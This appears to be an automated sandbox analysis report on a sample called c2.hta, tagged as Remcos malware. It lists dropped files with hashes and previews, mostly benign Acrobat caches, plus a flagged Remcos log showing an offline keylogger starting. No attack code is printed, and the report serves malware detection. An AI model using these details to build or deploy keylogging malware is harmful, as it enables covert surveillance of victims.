	c2.hta	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.355145945653093
Encrypted:	false
SSDEEP:	3:rglswD/fU5JWRal2Jl+7R0DAlBG45klovDl6v:Mlsd5YcIeeDAlOWAv
MD5:	D0A8A99162A7B20DE6FBAF57EA34DD37
SHA1:	CFA380E774A76F6E188DA45942B0DEEFA3C7C0C7
SHA-256:	D2EC0682C13A624EF516C5DAE9BEDA004F09C42523BF92072D63D061E00BC047
SHA-512:	4055CE3AF723AB7DE112D424937906AC9528FE0710CEDE2A34B0BA99DE523860882D2D290AD120CFD42164956FF502C538FC9139E8AAC35DDD7BE48DA53C09BA
Malicious:	true
Preview:	....[.2.0.2.5./.0.1./.0.7. .0.0.:.2.4.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.155191654055323
Encrypted:	false
SSDEEP:	6:iOpHtXAq2Pwkn2nKuAl9OmbnIFUtLHtRhZmwlHtR7kwOwkn2nKuAl9OmbjLJ:7pNQvYfHAahFUtLNRh/lNR75JfHAaSJ
MD5:	AA0A7851BE10B9DC06869CA58E7CC995
SHA1:	D714E094BC1C1A6F013EEE05DD6F4CE62A70724E
SHA-256:	7CC27536FB4C3CF982F67F9B0BEEA8B9DF492EF104845B7FA0A32B01BD5A82F5
SHA-512:	4C171EF688272DCFAE0A9FCBFCB3A7D026628F0AE8D9A0F0204C945CB8B8FF1F03364143386D4F1B886243D2052CFF3DCB24B70FC1A46514EE93A8D6ABD0AA15
Malicious:	false
Preview:	2025/01/07-00:23:03.552 1d14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-00:23:03.554 1d14 Recovering log #3.2025/01/07-00:23:03.554 1d14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.155191654055323
Encrypted:	false
SSDEEP:	6:iOpHtXAq2Pwkn2nKuAl9OmbnIFUtLHtRhZmwlHtR7kwOwkn2nKuAl9OmbjLJ:7pNQvYfHAahFUtLNRh/lNR75JfHAaSJ
MD5:	AA0A7851BE10B9DC06869CA58E7CC995
SHA1:	D714E094BC1C1A6F013EEE05DD6F4CE62A70724E
SHA-256:	7CC27536FB4C3CF982F67F9B0BEEA8B9DF492EF104845B7FA0A32B01BD5A82F5
SHA-512:	4C171EF688272DCFAE0A9FCBFCB3A7D026628F0AE8D9A0F0204C945CB8B8FF1F03364143386D4F1B886243D2052CFF3DCB24B70FC1A46514EE93A8D6ABD0AA15
Malicious:	false
Preview:	2025/01/07-00:23:03.552 1d14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-00:23:03.554 1d14 Recovering log #3.2025/01/07-00:23:03.554 1d14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.177823773626214
Encrypted:	false
SSDEEP:	6:iOpHJq2Pwkn2nKuAl9Ombzo2jMGIFUtLH9ZmwlHykwOwkn2nKuAl9Ombzo2jMmLJ:7ppvYfHAa8uFUtLd/lS5JfHAa8RJ
MD5:	D247D6B2EB69943290F3CCFECD663DE5
SHA1:	535DEEC76480E15A51DD67628E774E5824DF8FA8
SHA-256:	683EBAD8ED3C10F7EFDDD7E0851C9542FA80AF01310FA23DBC46FD755E4763D3
SHA-512:	F2DA5F22ED8C899332AFD9F343EB48CFAA31FF18112024DA1123ED8E2427B88EC87C845535A5A93254A76F1DF7F5AB776DA7B412A7A89D6E210F2A9C7086F7F2
Malicious:	false
Preview:	2025/01/07-00:23:03.585 1dd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-00:23:03.586 1dd4 Recovering log #3.2025/01/07-00:23:03.587 1dd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.177823773626214
Encrypted:	false
SSDEEP:	6:iOpHJq2Pwkn2nKuAl9Ombzo2jMGIFUtLH9ZmwlHykwOwkn2nKuAl9Ombzo2jMmLJ:7ppvYfHAa8uFUtLd/lS5JfHAa8RJ
MD5:	D247D6B2EB69943290F3CCFECD663DE5
SHA1:	535DEEC76480E15A51DD67628E774E5824DF8FA8
SHA-256:	683EBAD8ED3C10F7EFDDD7E0851C9542FA80AF01310FA23DBC46FD755E4763D3
SHA-512:	F2DA5F22ED8C899332AFD9F343EB48CFAA31FF18112024DA1123ED8E2427B88EC87C845535A5A93254A76F1DF7F5AB776DA7B412A7A89D6E210F2A9C7086F7F2
Malicious:	false
Preview:	2025/01/07-00:23:03.585 1dd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-00:23:03.586 1dd4 Recovering log #3.2025/01/07-00:23:03.587 1dd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\21088d3e-c563-4f23-9eba-fb19f8c8df6c.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.9659513190737
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq6P6hsBdOg2HTZcaq3QYiubInP7E4T3y:Y2sRdsFPRdMHc3QYhbG7nby
MD5:	3EBB025FFA6A42CD4BB0B17A28FF3F7D
SHA1:	020BF0A2209A6C576E8882A534890A364724400F
SHA-256:	54809315A3538EB837D4F3BB9C51D26B8530BC7FE4CBFD203EA2CBEEF0D7E71D
SHA-512:	149674680A291728BD09F46B58B23257ABBC2442D953F56B76CA6AC1BF944D57E720546D3CF4A71C7BDE95E02BDEE1CCB2BA27FC13BC1C2B9018AA1817FB5852
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380787396124274","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":142479},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.9659513190737
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq6P6hsBdOg2HTZcaq3QYiubInP7E4T3y:Y2sRdsFPRdMHc3QYhbG7nby
MD5:	3EBB025FFA6A42CD4BB0B17A28FF3F7D
SHA1:	020BF0A2209A6C576E8882A534890A364724400F
SHA-256:	54809315A3538EB837D4F3BB9C51D26B8530BC7FE4CBFD203EA2CBEEF0D7E71D
SHA-512:	149674680A291728BD09F46B58B23257ABBC2442D953F56B76CA6AC1BF944D57E720546D3CF4A71C7BDE95E02BDEE1CCB2BA27FC13BC1C2B9018AA1817FB5852
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380787396124274","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":142479},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.255799516722882
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Rtsx3k:etJCV4FiN/jTN/2r8Mta02fEhgO73goh
MD5:	97D7AC6E61762022A2D233B4254D128C
SHA1:	9B0F325F2017F6FC760E18FBE497F52FE35D4C3A
SHA-256:	C67505AD744A9358A4F62E4E22A1A7398DE1FE9B17097DC4EE81EB5649D19BDB
SHA-512:	D47E2B044432DA43B1A789815C835369202F0BD59FAED02F948F0F68522DCD7BE38F3D3B204E38D55E400875AF8A8B62BCFBD09AF0B907AFF208203A5ABE7C05
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.169921541152411
Encrypted:	false
SSDEEP:	6:iOpHhOOq2Pwkn2nKuAl9OmbzNMxIFUtLHJcs9ZmwlHJcsPkwOwkn2nKuAl9OmbzE:7pBrvYfHAa8jFUtLpb/lpx5JfHAa84J
MD5:	B72131F567EB362BFBE338E65F0C7D1D
SHA1:	46D3E8DFB2F329D21272C3AAE1DE665BFB149E35
SHA-256:	6EDD06D18992D8A7EB4C5305B223C45C896A65BD78779039BD8A6E50B1452020
SHA-512:	79C9624B15F3CB0114C6CBB0FDC3E5B635FC93B595D82EC864E197E8340A3465D684922DE563184FDEAA6DAF009F646034A99765E7BF88B2508821191B15518F
Malicious:	false
Preview:	2025/01/07-00:23:03.769 1dd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-00:23:03.771 1dd4 Recovering log #3.2025/01/07-00:23:03.771 1dd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.169921541152411
Encrypted:	false
SSDEEP:	6:iOpHhOOq2Pwkn2nKuAl9OmbzNMxIFUtLHJcs9ZmwlHJcsPkwOwkn2nKuAl9OmbzE:7pBrvYfHAa8jFUtLpb/lpx5JfHAa84J
MD5:	B72131F567EB362BFBE338E65F0C7D1D
SHA1:	46D3E8DFB2F329D21272C3AAE1DE665BFB149E35
SHA-256:	6EDD06D18992D8A7EB4C5305B223C45C896A65BD78779039BD8A6E50B1452020
SHA-512:	79C9624B15F3CB0114C6CBB0FDC3E5B635FC93B595D82EC864E197E8340A3465D684922DE563184FDEAA6DAF009F646034A99765E7BF88B2508821191B15518F
Malicious:	false
Preview:	2025/01/07-00:23:03.769 1dd4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/07-00:23:03.771 1dd4 Recovering log #3.2025/01/07-00:23:03.771 1dd4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250107052308Z-173.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	1.7544134515160215
Encrypted:	false
SSDEEP:	192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
MD5:	A61E2E877B9BEBF90983EE1455F6C731
SHA1:	C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
SHA-256:	FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
SHA-512:	B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444661358174712
Encrypted:	false
SSDEEP:	384:yezci5t2iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r5s3OazzU89UTTgUL
MD5:	0248C64171C7B683E73965AB27A1ED6C
SHA1:	C2E7747DC00C02C3CC1A141ECD945BABDDB7F478
SHA-256:	74CB7B02CDBF7888EB6383A09E0C684BAC2BA18DAFCB52241630ED21820395B0
SHA-512:	445669D5CAEF46D301BC5D01699EE091A155E08E1C7CB4B93BD95858865923CF7F4C132B68D28C9CF1E54D0CE82C7061704844C331814E0843B0DC8912CFBACD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.773831108109899
Encrypted:	false
SSDEEP:	48:7Mwp/E2ioyVbioy9oWoy1Cwoy1/KOioy1noy1AYoy1Wioy1hioybioy/oy1noy1r:7LpjubFuXKQKhb9IVXEBodRBkF
MD5:	41E767C9840F60E6F37937D09E2714A8
SHA1:	2AD7D699ACE4D5558D29A21A1F7F7F9494C8144A
SHA-256:	87DF80BF0C6E7C75460D0217AAE342A5F4368F612BEDE2B31E54F8529A149B49
SHA-512:	9D7CAE0429CE98D91CB2AFA3952C01F553B4EAA8265CA53A160F51F9DDB7811B4065F75AF3A91078ADB5E59F186DBBD4415975868D29836A36D87B97E0F64BDE
Malicious:	false
Preview:	.... .c.......O................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7790941963225158
Encrypted:	false
SSDEEP:	3:kkFkl+VTpl1fllXlE/HT8kmkz/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKnVH2T8yrTNMa8RdWBwRd
MD5:	21EF1FD3505A0ED419BA2784B5AEA637
SHA1:	E49CFE923BFC126FD046CED29274D0C52AE1E764
SHA-256:	1219D3D10DC7A448EAC83D4CF013714390AB6361BF3F97FC5D6CBE7127C79DB8
SHA-512:	17D2725256BB99154D188E82D17033C26DF0EB8BACFCDC93E0CCA4BD8934AD2FA5B22F7DDAEB822BAA549DAA541B424FFA4EE2740CCC096B0938E96F9BF98F9D
Malicious:	false
Preview:	p...... ........MlwA.`..(....................................................... ..........W.....H..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kKpt9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KDImsLNkPlE99SNxAhUe/3
MD5:	80969443E414490DC53CAC9144AAA705
SHA1:	895D3DC0D73DB1DD619F0F6D25C8E2546F711A74
SHA-256:	D54D5B1447A900E9739792C592B818FF0C08DF7578508F73CEF9DAB053F39F75
SHA-512:	EC64101A480E06A893B48FA4F8D83C416DC08D68B4EEE3794CC934096FC7E703474DAA48ABEC90097DEBE13B31A7F04C24187E25104F96587C1CCBF335BC897D
Malicious:	false
Preview:	p...... ........Ev.S.`..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7204

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
